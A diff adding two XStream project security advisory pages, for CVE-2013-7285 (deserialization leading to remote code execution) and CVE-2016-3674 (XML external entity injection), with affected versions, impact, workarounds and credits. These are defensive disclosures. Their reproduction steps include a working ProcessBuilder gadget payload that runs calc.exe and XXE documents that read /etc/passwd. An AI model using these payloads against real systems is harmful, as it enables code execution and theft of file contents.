x-stream
diff --git a/‎1.4.20/CVE-2013-7285.html
+184 b/‎1.4.20/CVE-2013-7285.html
+184
diff --git a/‎1.4.20/CVE-2016-3674.html
+187 b/‎1.4.20/CVE-2016-3674.html
+187
@@ -0,0 +1,184 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<!--
+ Copyright (C) 2005, 2006 Joe Walnes.
+ Copyright (C) 2006, 2007, 2008, 2021 XStream committers.
+ All rights reserved.
+ 
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+ 
+ Created on 29. January 2005 by Joe Walnes
+ -->
+    <head>
+        <title>XStream - CVE-2013-7285</title>
+        <link rel="stylesheet" type="text/css" href="style.css"/>
+        
+    
+  
+
+        <!-- Google analytics -->
+        <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
+        </script>
+        <script type="text/javascript">
+          _uacct = "UA-110973-2";
+          urchinTracker();
+        </script>
+
+    </head>
+    <body>
+
+        <div id="banner">
+            <a href="index.html"><img id="logo" src="logo.gif" alt="XStream"/></a>
+        </div>
+
+        <div id="center" class="Content2Column">  <!-- Content3Column for index -->
+            <div id="content">
+                <h1 class="FirstChild">CVE-2013-7285</h1>
+
+                
+
+    <h2 id="vulnerability">Vulnerability</h2>
+    
+    <p>CVE-2013-7285: XStream can be used for Remote Code Execution.</p>
+	
+    <h2 id="affected_versions">Affected Versions</h2>
+    
+	<p>All versions until and including version 1.4.6 are affected, but a <a href="#workaround">workaround</a> exist.</p>
+	
+	<p>Version 1.4.10 is affected if the security framework has not been initialized.</p>
+
+    <h2 id="description">Description</h2>
+    
+    <p>The processed stream at unmarshalling time contains type information to recreate the formerly written objects.
+    XStream creates therefore new instances based on these type information.  An attacker can manipulate the processed
+    input stream and replace or inject objects, that can execute arbitrary shell commands.</p>
+
+    <h2 id="reproduction">Steps to Reproduce</h2>
+
+	<p>Create a simple interface e.g. named <em>Contact</em> and an implementation class.  Use XStream to marshal such
+	an object to XML. Replace the XML with following snippet and unmarshal it again with XStream:</p>
+<div class="Source XML"><pre>&lt;contact class='dynamic-proxy'&gt;
+  &lt;interface&gt;org.company.model.Contact&lt;/interface&gt;
+  &lt;handler class='java.beans.EventHandler'&gt;
+    &lt;target class='java.lang.ProcessBuilder'&gt;
+      &lt;command&gt;
+        &lt;string&gt;calc.exe&lt;/string&gt;
+      &lt;/command&gt;
+    &lt;/target&gt;
+    &lt;action&gt;start&lt;/action&gt;
+  &lt;/handler&gt;
+&lt;/contact&gt;
+</pre></div>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+Contact contact = (Contact)xstream.fromXML(xml);
+</pre></div>
+
+    <p>Then as soon as the code calls any method on the Contact instance, the payload gets executed, e.g.
+    contact.getFirstName().</p>
+
+    <p>Note, this example uses XML, but the attack can be performed for any supported format. e.g. JSON.</p>
+
+    <h2 id="impact">Impact</h2>
+
+	<p>The vulnerability may allow a remote attacker to run arbitrary shell commands only by manipulating the processed
+	input stream.</p>
+
+    <h2 id="workaround">Workaround</h2>
+	<p>Users can register an own converter for dynamic proxies, the <em>java.beans.EventHandler</em> type or for the
+	<em>java.lang.ProcessBuilder</em> type, that also protects against an attack for this special case:</p>
+<div class="Source Java"><pre>xstream.registerConverter(new Converter() {
+  public boolean canConvert(Class type) {
+    return type != null &amp;&amp; (type == java.beans.EventHandler || type == java.lang.ProcessBuilder || Proxy.isProxy(type));
+  }
+
+  public Object unmarshal(HierarchicalStreamReader reader, UnmarshallingContext context) {
+    throw new ConversionException("Unsupported type due to security reasons.");
+  }
+
+  public void marshal(Object source, HierarchicalStreamWriter writer, MarshallingContext context) {
+    throw new ConversionException("Unsupported type due to security reasons.");
+  }
+}, XStream.PRIORITY_LOW);
+</pre></div>
+
+    <h2 id="credits">Credits</h2>
+    
+    <p>The vulnerability was discovered and reported by Pierre Francis Ernst of IBM Canada.</p>
+    
+  	
+
+                <br/>
+
+            </div>
+        </div>
+
+        <div class="SidePanel" id="left">
+                    <div class="MenuGroup">
+                        <h1>Software</h1>
+                        <ul>
+                                    <li><a href="index.html">About XStream</a></li>
+                                    <li><a href="news.html">News</a></li>
+                                    <li><a href="changes.html">Change History</a></li>
+                                    <li><a href="security.html">Security Aspects</a></li>
+                                    <li><a href="versioning.html">About Versioning</a></li>
+                        </ul>
+                    </div>
+                    <div class="MenuGroup">
+                        <h1>Evaluating XStream</h1>
+                        <ul>
+                                    <li><a href="tutorial.html">Two Minute Tutorial</a></li>
+                                    <li><a href="license.html">License</a></li>
+                                    <li><a href="download.html">Download</a></li>
+                                    <li><a href="references.html">References</a></li>
+                                    <li><a href="benchmarks.html">Benchmarks</a></li>
+                                    <li><a href="https://www.openhub.net/p/xstream">Code Statistics</a></li>
+                        </ul>
+                    </div>
+                    <div class="MenuGroup">
+                        <h1>Using XStream</h1>
+                        <ul>
+                                    <li><a href="architecture.html">Architecture Overview</a></li>
+                                    <li><a href="graphs.html">Object references</a></li>
+                                    <li><a href="manual-tweaking-output.html">Tweaking the Output</a></li>
+                                    <li><a href="converters.html">Converters</a></li>
+                                    <li><a href="faq.html">Frequently Asked Questions</a></li>
+                                    <li><a href="mailing-lists.html">Mailing Lists</a></li>
+                                    <li><a href="issues.html">Reporting Issues</a></li>
+                        </ul>
+                    </div>
+                    <div class="MenuGroup">
+                        <h1>Javadoc</h1>
+                        <ul>
+                                    <li><a href="javadoc/index.html">XStream Core</a></li>
+                                    <li><a href="hibernate-javadoc/index.html">Hibernate Extensions</a></li>
+                                    <li><a href="jmh-javadoc/index.html">JMH Module</a></li>
+                        </ul>
+                    </div>
+                    <div class="MenuGroup">
+                        <h1>Tutorials</h1>
+                        <ul>
+                                    <li><a href="tutorial.html">Two Minute Tutorial</a></li>
+                                    <li><a href="alias-tutorial.html">Alias Tutorial</a></li>
+                                    <li><a href="annotations-tutorial.html">Annotations Tutorial</a></li>
+                                    <li><a href="converter-tutorial.html">Converter Tutorial</a></li>
+                                    <li><a href="objectstream.html">Object Streams Tutorial</a></li>
+                                    <li><a href="persistence-tutorial.html">Persistence API Tutorial</a></li>
+                                    <li><a href="json-tutorial.html">JSON Tutorial</a></li>
+                                    <li><a href="http://www.studytrails.com/java/xml/xstream/xstream-introduction.jsp">StudyTrails</a></li>
+                        </ul>
+                    </div>
+                    <div class="MenuGroup">
+                        <h1>Developing XStream</h1>
+                        <ul>
+                                    <li><a href="how-to-contribute.html">How to Contribute</a></li>
+                                    <li><a href="team.html">Development Team</a></li>
+                                    <li><a href="repository.html">Source Repository</a></li>
+                                    <li><a href="https://travis-ci.org/x-stream/xstream/branches">Continuous Integration</a></li>
+                        </ul>
+                    </div>
+        </div>
+
+  </body>
+</html>
@@ -0,0 +1,187 @@
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"  "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html xmlns="http://www.w3.org/1999/xhtml">
+<!--
+ Copyright (C) 2005, 2006 Joe Walnes.
+ Copyright (C) 2006, 2007, 2008, 2021 XStream committers.
+ All rights reserved.
+ 
+ The software in this package is published under the terms of the BSD
+ style license a copy of which has been included with this distribution in
+ the LICENSE.txt file.
+ 
+ Created on 29. January 2005 by Joe Walnes
+ -->
+    <head>
+        <title>XStream - CVE-2016-3674</title>
+        <link rel="stylesheet" type="text/css" href="style.css"/>
+        
+    
+  
+
+        <!-- Google analytics -->
+        <script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
+        </script>
+        <script type="text/javascript">
+          _uacct = "UA-110973-2";
+          urchinTracker();
+        </script>
+
+    </head>
+    <body>
+
+        <div id="banner">
+            <a href="index.html"><img id="logo" src="logo.gif" alt="XStream"/></a>
+        </div>
+
+        <div id="center" class="Content2Column">  <!-- Content3Column for index -->
+            <div id="content">
+                <h1 class="FirstChild">CVE-2016-3674</h1>
+
+                
+
+    <h2 id="vulnerability">Vulnerability</h2>
+    
+    <p>CVE-2016-3674: XML External Entity (XXE) Vulnerability in XStream.</p>
+	
+    <h2 id="affected_versions">Affected Versions</h2>
+    
+	<p>XStream is not vulnerable, if the default XML Pull Parser is used (Xpp3 or kXML2), since these parser types do
+	not process XML entities at all.</p>
+	
+	<p>All versions until and including version 1.4.8 are affected, if they use explicitly one of the following parsers:</p>
+	<ul>
+		<li>DOM4J</li>
+		<li>DOM</li>
+		<li>JDOM</li>
+		<li>JDOM2</li>
+		<li>StAX implementation</li>
+		<li>XOM</li>
+	</ul>
+	
+	<p>XStream's HierarchicalStreamDriver implementations will now explicitly turn off the processing of external
+	entities, but the setting is not respected by all parser implementations.	XStream stays therefore vulnerable in
+	future, if one of the following parser implementations is explicitly used:</p>
+	<ul>
+		<li>DOM implementation from Java 5 runtime and below</li>
+		<li>StAX implementation from Java 6 runtime and below</li>
+		<li>StAX implementation from BEA (old reference implementation)</li>
+		<li>XOM</li>
+	</ul>
+	
+	<p>See <a href="faq.html#Security_XXEVulnerability">FAQ</a> for a matrix explaining some parser behavior.</p>
+
+    <h2 id="description">Description</h2>
+    
+    <p>XStream supports a lot of different XML parsers. Some of those can also process external entities which was
+    enabled by default.  An attacker could therefore provide manipulated XML as input to access data on the file
+    system, see <a href="https://www.owasp.org/index.php/XML_External_Entity_%28XXE%29_Processing">XXE Vulnerability</a>.</p>
+
+    <h2 id="reproduction">Steps to Reproduce</h2>
+
+	<p>An attacker might use external general or parameter entities:</p>
+<div class="Source XML"><pre>&lt;?xml version=&quot;1.0&quot;&gt;
+  &lt;!DOCTYPE root [
+    &lt;!ELEMENT string (#PCDATA)&gt;
+    &lt;!ENTITY content SYSTEM &quot;file:/etc/passwd&quot;&gt;
+]&gt;&lt;string&gt;&amp;content;&lt;/string&gt;
+</pre></div>
+<div class="Source XML"><pre>&lt;?xml version=&quot;1.0&quot;&gt;
+  &lt;!DOCTYPE root [
+    &lt;!ELEMENT string (#PCDATA)&gt;
+    &lt;!ENTITY content SYSTEM &quot;file:/etc/passwd&quot;&gt;
+    %content;
+]&gt;&lt;string&gt;test&lt;/string&gt;
+</pre></div>
+	<p>Use one of the XML documents above, initialize XStream with a vulnerable parser and unmarshal the XML:</p>
+<div class="Source Java"><pre>XStream xstream = new XStream();
+String s = (String)xstream.fromXML(xml);
+</pre></div>
+
+    <h2 id="impact">Impact</h2>
+
+	<p>The vulnerability may allow a remote attacker to retrieve the content of arbitrary files with known locations in
+	a local file system if the Java process has read access.</p>
+
+    <h2 id="workarounds">Workaround</h2>
+
+	<p>Use one of the XML Pull Parser implementations.</p>
+
+    <h2 id="credits">Credits</h2>
+    
+    <p>The vulnerability was discovered and reported by Alexander Klink.</p>
+    
+  	
+
+                <br/>
+
+            </div>
+        </div>
+
+        <div class="SidePanel" id="left">
+                    <div class="MenuGroup">
+                        <h1>Software</h1>
+                        <ul>
+                                    <li><a href="index.html">About XStream</a></li>
+                                    <li><a href="news.html">News</a></li>
+                                    <li><a href="changes.html">Change History</a></li>
+                                    <li><a href="security.html">Security Aspects</a></li>
+                                    <li><a href="versioning.html">About Versioning</a></li>
+                        </ul>
+                    </div>
+                    <div class="MenuGroup">
+                        <h1>Evaluating XStream</h1>
+                        <ul>
+                                    <li><a href="tutorial.html">Two Minute Tutorial</a></li>
+                                    <li><a href="license.html">License</a></li>
+                                    <li><a href="download.html">Download</a></li>
+                                    <li><a href="references.html">References</a></li>
+                                    <li><a href="benchmarks.html">Benchmarks</a></li>
+                                    <li><a href="https://www.openhub.net/p/xstream">Code Statistics</a></li>
+                        </ul>
+                    </div>
+                    <div class="MenuGroup">
+                        <h1>Using XStream</h1>
+                        <ul>
+                                    <li><a href="architecture.html">Architecture Overview</a></li>
+                                    <li><a href="graphs.html">Object references</a></li>
+                                    <li><a href="manual-tweaking-output.html">Tweaking the Output</a></li>
+                                    <li><a href="converters.html">Converters</a></li>
+                                    <li><a href="faq.html">Frequently Asked Questions</a></li>
+                                    <li><a href="mailing-lists.html">Mailing Lists</a></li>
+                                    <li><a href="issues.html">Reporting Issues</a></li>
+                        </ul>
+                    </div>
+                    <div class="MenuGroup">
+                        <h1>Javadoc</h1>
+                        <ul>
+                                    <li><a href="javadoc/index.html">XStream Core</a></li>
+                                    <li><a href="hibernate-javadoc/index.html">Hibernate Extensions</a></li>
+                                    <li><a href="jmh-javadoc/index.html">JMH Module</a></li>
+                        </ul>
+                    </div>
+                    <div class="MenuGroup">
+                        <h1>Tutorials</h1>
+                        <ul>
+                                    <li><a href="tutorial.html">Two Minute Tutorial</a></li>
+                                    <li><a href="alias-tutorial.html">Alias Tutorial</a></li>
+                                    <li><a href="annotations-tutorial.html">Annotations Tutorial</a></li>
+                                    <li><a href="converter-tutorial.html">Converter Tutorial</a></li>
+                                    <li><a href="objectstream.html">Object Streams Tutorial</a></li>
+                                    <li><a href="persistence-tutorial.html">Persistence API Tutorial</a></li>
+                                    <li><a href="json-tutorial.html">JSON Tutorial</a></li>
+                                    <li><a href="http://www.studytrails.com/java/xml/xstream/xstream-introduction.jsp">StudyTrails</a></li>
+                        </ul>
+                    </div>
+                    <div class="MenuGroup">
+                        <h1>Developing XStream</h1>
+                        <ul>
+                                    <li><a href="how-to-contribute.html">How to Contribute</a></li>
+                                    <li><a href="team.html">Development Team</a></li>
+                                    <li><a href="repository.html">Source Repository</a></li>
+                                    <li><a href="https://travis-ci.org/x-stream/xstream/branches">Continuous Integration</a></li>
+                        </ul>
+                    </div>
+        </div>
+
+  </body>
+</html>